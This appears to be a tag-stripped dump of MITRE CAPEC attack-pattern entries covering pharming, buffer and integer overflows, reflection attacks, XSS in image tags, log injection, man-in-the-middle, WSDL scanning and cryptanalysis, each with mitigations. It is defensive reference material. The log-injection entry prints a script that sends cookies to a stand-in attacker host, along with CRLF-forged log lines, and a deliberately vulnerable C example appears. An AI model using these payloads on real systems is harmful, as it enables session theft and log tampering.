The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website
When the victim requests the URL for the site, the poisoned records direct the victim to the attackers' system rather than the original one.
Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now "farm" sensitive information such as credentials or account numbers.
Vulnerable DNS software or improperly protected hosts file or router that can be poisoned
A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming
Very High
High
Spoofing
Analysis
Modification of Resources
An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.
An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.
Medium
The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills.
Except having enough knowledge of the way the targeted site has been structured in order to create a fake version, no additional resources are required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited.
The attacker observes the targeted website for use of secure connection to exchange sensitive information. If it does not use secure connections, victim users cannot distinguish between the original and fake versions of the website.
The attacker can also fingerprint the software running on the targeted system (DNS server, router or host) and look for vulnerabilities in order to poison the entries.
All sensitive information must be handled over a secure connection.
Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.
End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.
Confidentiality
Read application data
346
Targeted
247
Targeted
292
Targeted
CVE-2005-0877
Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq.
CVE-2004-1754
The DNS proxy (DNSd) for multiple Symantec Gateway Security products allows remote attackers to poison the DNS cache via a malicious DNS server query response that contains authoritative or additional records.
1000
Attack Pattern
ChildOf
151
1000
Attack Pattern
ChildOf
161
Reluctance To Trust
Promoting Privacy
Use Authentication Mechanisms, Where Appropriate, Correctly
Use Well-Known Cryptography Appropriately and Correctly
Reconnaissance
High
High
Low
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root.
Attacker identifies command utilities exposed by the target host.
On the probing stage, the attacker interacts with the command utility and observes the results of its input. The attacker's goal is to uncover a buffer overflow in the command utility. For instance the attacker may find that input data are not properly validated.
The attacker finds a buffer overflow vulnerability in the command utility and tries to exploit it. He crafts malicious code and injects it using the command utility. The attacker can at worst execute remote code on the target host.
The target host exposes a command-line utility to the user.
The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited.
High
High
Injection
API Abuse
Attack Example: HPUX passwd
A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.
Attack Example: Solaris getopt
A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].
Low
An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.
The attacker can probe for services available on the target host. Many services may expose a command utility. For instance Telnet is a service which can be invoked through a command shell.
Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.
Use a language or compiler that performs automatic bounds checking.
Use an abstraction library to abstract away risky APIs. Not a complete solution.
Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Operational: Use OS-level preventative functionality. Not a complete solution.
Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.
Do not unnecessarily expose services.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify memory
Availability
DoS: crash / exit / restart
Confidentiality
Read memory
The user supplied data.
The buffer overrun by the attacker.
When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code.
The most common is remote code execution.
120
Targeted
118
Targeted
119
Targeted
74
Targeted
20
Targeted
680
Targeted
733
Secondary
697
Targeted
1000
Attack Pattern
ChildOf
100
1000
Attack Pattern
ChildOf
10
Reluctance to trust
Defense in Depth
Least Privilege
Bound checking should be performed when copying data to a buffer.
Penetration
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials.
Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.
The attacker opens a connection to the target server and sends it a challenge
The server responds by returning the challenge encrypted with a shared secret as well as its own challenge to the attacker
Since the attacker does not possess the shared secret, he initiates a second connection to the server and sends it, as challenge, the challenge received from the server on the first connection
The server treats this as just another handshake and responds by encrypting the challenge and issuing its own to the attacker
The attacker now receives the encrypted challenge on the second connection and sends it as response to the server on the first connection, thereby successfully completing the handshake and authenticating to the server.
The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol.
High
High
Authentication is usually used as a means to identify and grant access to the user. If the authentication protocol can be defeated, in this instance by a reflection attack, authentication serves no purpose in identifying the legitimate users of the system from the illegitimate ones
Protocol Manipulation
Spoofing
A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.
An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.
Medium
The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges
All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately.
The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further
The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.
Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Bypass protection mechanism
Confidentiality
Read application data
301
Targeted
303
Secondary
718
Targeted
1000
Attack Pattern
ChildOf
220
1000
Attack Pattern
ChildOf
204
1000
Attack Pattern
ChildOf
114
Reluctance To Trust
Complete Mediation
Defense in Depth
Use Authentication Mechanisms, Where Appropriate, Correctly
Penetration
Exploitation
High
High
Low
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Image tags are an often overlooked, but convenient, means for a Cross Site Scripting attack. The attacker can inject script contents into an image (IMG) tag in order to steal information from a victim's browser and execute malicious scripts.
Spider
Using a browser , an attacker is looking at the application to figure out if it allows to specify images, upload them, etc.
Use a browser to manually explore the website and identify entry points where the application allows the upload (or other means of specification) of images. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
The application has image upload functionality.
env-Web
The application allows users to point to or otherwise specify images.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list entry points where images can be specified.
Do not allow user upload or specification of images
Proceed to a temporary account lockout when the user does too many suspicious attempts using image upload.
Probe identified potential entry points for XSS vulnerability
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.
Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed.
env-Web
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed.
env-Web
Use a proxy tool to record results of the created requests.
env-Web
The output of pages includes image tags specified by users.
env-Web
Output to the browser is not encoded to remove executable scripting syntax.
env-Web
The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.)
All context-sensitive characters are consistently re-encoded before being sent to the web browser. For example, in a HTML tag element, the payload may not be able to evade the quotes in order to inject another attribute.
Some sensitive characters are consistently encoded, but others are not. Depending on which type of non-script element the payload is injected in, it may be possible to evade the encodings.
Monitor input to web servers (not only GET, but all potential inputs like COOKIES, POST, HEADER), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Application permitting the inclusion or use of IMG tags
High
High
Techniques for discovery of XSS as well as tools and means to exploit them are fairly widely available and understood
Injection
An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags.
A malicious user can embed JavaScript in the IMG tags in his messages that get executed within the victim's browser whenever the victim reads these messages.
The malicious user can leverage Cross Site Scripting in image tags to steal sensitive information, such as usernames, passwords or cookies, and impersonate other users on the forum.
Medium
Besides the ability to figure out possibilities of injection, the attacker requires moderate scripting skills to successfully leverage cross site scripting in image tags
None
In addition to the traditional input fields, all other user controllable inputs, such as image tags within messages or the likes, must also be subjected to input validation. Such validation should ensure that content that can be potentially interpreted as script by the browser is appropriately filtered.
All output displayed to clients must be properly escaped. Escaping ensures that the browser interprets special scripting characters literally and not as script to be executed.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
User-controllable input to the application. Any input that can legitimately accept and render HTML image tag can be used as an injection vector.
HTML Image tag pointing to script or location of attacker's choice.
Victim's web browser.
Execution of the script in the victim's browser, contained in the image tag or from the location pointed to within the image tag.
82
Targeted
79
Targeted
74
Secondary
20
Secondary
692
Targeted
697
Targeted
713
Targeted
71
Targeted
CVE-2002-1808
Cross-site scripting (XSS) vulnerability in Meunity Community System 1.1 allows remote attackers to inject arbitrary web script or HTML via JavaScript in an IMG tag when creating a topic.
CVE-2006-6919
Firefox Sage extension 1.3.8 and earlier allows remote attackers to execute arbitrary JavaScript in the local context via an RSS feed with an img tag containing the script followed by an extra trailing ">", which Sage modifies to close the img element before the malicious script.
1000
Attack Pattern
ChildOf
18
Reluctance To Trust
Defense In Depth
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Treat the Entire Inherited Process Context as Unvalidated Input
Penetration
Exploitation
High
High
High
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.
The first step is exploratory meaning the attacker looks for an integer variable that he can control.
The attacker finds an integer variable that he can write into or manipulate and try to get the value of the integer out of the possible range.
The integer variable is forced to have a value out of range which set its final value to an unexpected value.
The target host acts on the data and unexpected behavior may happen.
The attacker can manipulate the value of an integer variable utilized by the target host.
The target host does not do proper range checking on the variable before utilizing it.
When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)
High
High
Modification of Resources
Injection
API Abuse
Analysis
Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value.
CVE-2007-1544
The following code illustrates an integer overflow. The declaration of total integer as "unsigned short int" assumes that the length of the first and second arguments fits in such an integer.
include <stdlib.h>
include <string.h>
include <stdio.h>
int main (int argc, char *const *argv)
{
if (argc !=3){
printf("Usage: prog_name <string1> <string2>\n");
exit(-1);
}
unsigned short int total;
total = strlen(argv[1])+strlen(argv[2])+1;
char * buff = (char *)malloc(total);
strcpy(buff, argv[1]);
strcpy(buff, argv[2]);
}
[R.92.4], [R.92.5]
Low
An attacker can simply overflow an integer by inserting an out of range value.
High
Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.
Vulnerability testing tool can be used to probe for integer overflow (e.g. fuzzer).
Use a language or compiler that performs automatic bounds checking.
Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.
Use an abstraction library to abstract away risky APIs. Not a complete solution.
Always do bound checking before consuming user input data.
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
Availability
DoS: crash / exit / restart
The user supplied data.
The integer overrun by the attacker.
When the function use the integer as offset, the offset may be out of the expected range which may lead to unexpected behavior such as issues of availability.
The most common are issues of availability. In some situation, an integer overflow can turn out to be an exploitable buffer overflow, then the attacker may be able to run arbitrary code on the target host.
190
Targeted
128
Targeted
120
Targeted
122
Secondary
196
Secondary
680
Targeted
697
Targeted
1000
Attack Pattern
ChildOf
128
Reluctance to Trust
Exploitation
Low
Medium
High
All
All
All
All
J. Viega
G. McGraw
Building Secure Software
Addison-Wesley
2002
Common Weakness Enumeration (CWE)
CWE-190 - Integer overflow (wrap or wraparound)
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/190.html
The OWASP Application Security Desk Reference
Integer overflow
The Open Web Application Security Project (OWASP)
2009
http://www.owasp.org/index.php/Integer_overflow
Robert C. Seacord
SAMATE - Software Assurance Metrics And Tool Evaluation
Test Case ID 1511
National Institute of Standards and Technology (NIST)
2006-05-22
http://samate.nist.gov/SRD/view_testcase.php?tID=1511
Robert C. Seacord
Secure Coding in C and C++
Page 152, Figure 5-1
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.
Determine Application's Log File Format
The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.
Determine logging utility being used by application (e.g. log4j)
env-All
Gain access to application's source code to determine log file formats.
env-All
Install or obtain access to instance of application and observe its log file format.
env-All
Attacker determines log file format used by application.
Attacker cannot conclusively determine log file format; he/she can only guess what the format is.
Manipulate Log Files
The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.
Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:
"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in"
may add the following forged entry into a log file:
"[Thu Nov 12 12:11:22]:Info: User admin logged in"
Different applications may require different encodings of the carriage return and line feed characters.
env-All
Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain
<script>new Image().src="http://xss.attacker.com/log_cookie?cookie="+encodeURI(document.cookie);</script>
The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).
env-All
Forged entry or other malicious data inserted into application's logs.
No entry inserted into logs, or the entry is visibly distinguishable from real entries.
Input validation to ensure that only legal characters supplied by users can be entered into log files
Encode information from user such that any unexpected characters are encoded safely before they are entered into log files.
Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however.
The target host is logging the action and data of the user.
The target host insufficiently protects access to the logs or logging mechanisms.
High
High
Analysis
Modification of Resources
Injection
Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php.
CVE-2006-0201
If a user submits the string "twenty-one" for val, the following entry is logged:
INFO: Failed to parse val=twenty-one
However, if an attacker submits the string
twenty-one%0a%0aINFO:+User+logged+out%3dbadguy
the following entry is logged:
INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy
Clearly, attackers can use this same mechanism to insert arbitrary log entries.
[R.93.2]
Low
This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.
Medium
A more sophisticated attack can try to defeat the input validation mechanism.
The attacker will try to determine which data may be logged in case of a success or failure of a predetermined action such as authentication. Once that data has been identified, the attacker may try to craft malicious data to inject.
Vulnerability testing tool can be used to test the input validation mechanism.
Carefully control access to physical log files.
Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data.
Use synchronization to control the flow of execution.
Use static analysis tools to identify log forging vulnerabilities.
Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.
Integrity
Modify application data
The variable being logged
The malicious characters or the crafted data which should forge the log entry.
The logging mechanism (This can be as simple as writing to a file, logging API, etc.)
Log tampering or forgery (misleading data)
117
Targeted
92
Secondary
150
Secondary
713
Targeted
1000
Attack Pattern
ChildOf
268
Reluctance to Trust
Obfuscation
Medium
High
High
All
All
All
All
J. Viega
G. McGraw
Building Secure Software
Addison-Wesley
2002
Common Weakness Enumeration (CWE)
CWE-117 - Log Forging
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/117.html
A. Muffet
The night the log was forged
http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm
The OWASP Application Security Desk Reference
Log injection
The Open Web Application Security Project (OWASP)
2009
http://www.owasp.org/index.php/Log injection
Fortify Software
SAMATE - Software Assurance Metrics And Tool Evaluation
Test Case ID 1579
National Institute of Standards and Technology (NIST)
2006-06-22
http://samate.nist.gov/SRD/view_testcase.php?tID=1579
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never intercepted. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components.
The attacker probes to determine the nature and mechanism of communication between two components looking for opportunities to exploit.
The attacker inserts himself into the communication channel initially acting as a routing proxy between the two targeted components. The attacker may or may not have to use cryptography.
The attacker observes, filters or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for his own purposes.
There are two components communicating with each other.
An attacker is able to identify the nature and mechanism of communication between the two target components.
An attacker can eavesdrop on the communication between the target components.
Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.
The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption.
Very High
Very High
Spoofing
Analysis
Modification of Resources
Symantec Scan Engine 5.0.0.24, and possibly other versions before 5.1.0.7, uses the same private DSA key for each installation, which allows remote attackers to conduct man-in-the-middle attacks and decrypt communications.
CVE-2006-0231
Medium
This attack can get sophisticated since the attack may use cryptography.
The attacker can try to get the public-keys of the victims.
There are free software tool to perform man in the middle attack (packet analysis, etc.)
Get your Public Key signed by a Certificate Authority
Encrypt your communication using cryptography (SSL,...)
Use Strong mutual authentication to always fully authenticate both ends of any communications channel.
Exchange public keys using a secure channel
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
The captured or modified data in transit
The new value of the data or the replay of the same data (e.g. credential)
The messages exchanged between the two target hosts.
Privilege escalation. modification of resource, information leakage, etc.
300
Targeted
290
Secondary
593
Secondary
287
Targeted
294
Secondary
724
Secondary
1000
Attack Pattern
ChildOf
22
Complete Mediation
Exploitation
High
High
High
All
All
All
All
Common Weakness Enumeration (CWE)
CWE-300 - Man-in-the-middle (MITM)
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/300.html
M. Bishop
Computer Security: Art and Science
Addison-Wesley
2003
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.
The first step is exploratory meaning the attacker scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the attacker.
The second step that an attacker would undertake is to analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The attacker could run through all of the operations with different message request patterns until a breach is identified.
Once an attacker finds a potential weakness, they can craft malicious content to be sent to the system. For instance the attacker may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the attacker may not be XML validated and cause unexpected behavior.
A client program connecting to a web service can read the WSDL to determine what functions are available on the server.
The target host exposes vulnerable functions within its WSDL interface.
High
High
Analysis
API Abuse
A WSDL interface may expose a function vulnerable to SQL Injection.
The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.
Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.
Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.
Source : "Seven Steps to XML Mastery, Step 7: Ensure XML Security", Frank Coyle. See reference section.
Low
This attack can be as simple as reading WSDL and starting sending invalid request.
Medium
This attack can be used to perform more sophisticated attacks (SQL injection, etc.)
An attacker can request the WSDL file from the target host by sending a SOAP message.
There are free Vulnerability testing tool, such as WSDigger to perform WSDL scanning - Foundstone's free Web services security tool performs WSDL scanning, SQL injection and XSS attacks on Web Services.
It is important to protect WSDL file or provide limited access to it.
Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.
Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.
Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.
Validate the received messages against the WSDL Schema. Incomplete solution.
Confidentiality
Read application data
538
Targeted
1000
Category
ChildOf
210
Defense in Depth
Never Assuming that Your Secrets Are Safe
Securing the Weakest Link
Reconnaissance
Medium
Medium
High
SOA
All
All
All
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Walid Negm
Anatomy of a Web Services Attack
ForumSystems
March 1, 2004
http://www.forumsys.com/resources/resources/whitepapers/archive//Anatomy_of_Attack_wp.pdf
Frank Coyle
Seven Steps to XML Mastery
Step 7: Ensure XML Security
August 25, 2006
http://www.informit.com/articles/article.aspx?p=601349
CAPEC Content Team
The MITRE Corporation
2014-06-23
An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.
Determine what external libraries the application accesses.
Block access to the external libraries accessed by the application.
Monitor the behavior of the system to see if it goes into an insecure/inconsistent state.
If the system does go into an insecure/inconsistent state, leverage that to obtain information about the system functionality or data, elevate access control, etc. The rest of this attack will depend on the context and the desired goal.
An application requires access to external libraries.
An attacker has the privileges to block application access to external libraries.
Medium
Medium
API Abuse
Modification of Resources
A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account.
Low
Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.
Availability
Alter execution logic
Confidentiality
"Varies by context"
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
589
Targeted
227
Targeted
1000
Attack Pattern
ChildOf
176
Failing Securely
Exploitation
Low
Low
High
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as:
1. Total Break - Finding the secret key
2. Global Deduction - Finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key.
3. Information Deduction - Gaining some information about plaintexts or ciphertexts that was not previously known
4. Distinguishing Algorithm - The attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits
The goal of the attacker performing cryptanalysis will depend on the specific needs of the attacker in a given attack context. In most cases, if cryptanalysis is successful at all, an attacker will not be able to go past being able to deduce some information about the plaintext (goal 3). However, that may be sufficient for an attacker, depending on the context.
An attacker discovers a weakness in the cryptographic algorithm or a weakness in how it was applied to a particular chunk of plaintext.
An attacker leverages the discovered weakness to decrypt, partially decrypt or infer some information about the contents of the encrypted message. All of that is done without knowing the secret key.
The target software utilizes some sort of cryptographic algorithm.
An underlying weaknesses exists either in the cryptographic algorithm used or in the way that it was applied to a particular chunk of plaintext.
The encryption algorithm is known to the attacker.
An attacker has access to the ciphertext.
Very High
Very Low
Analysis
Brute Force
A very easy to understand (but totally inapplicable to modern cryptographic ciphers) example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis cryptanalysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter "E" in an English language occurs with a certain known frequency (about 12.7%), whatever "E" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is just here to illustrate a rudimentary example of cryptanalysis.
High
Cryptanalysis generally requires a very significant level of understanding of mathematics and computation.
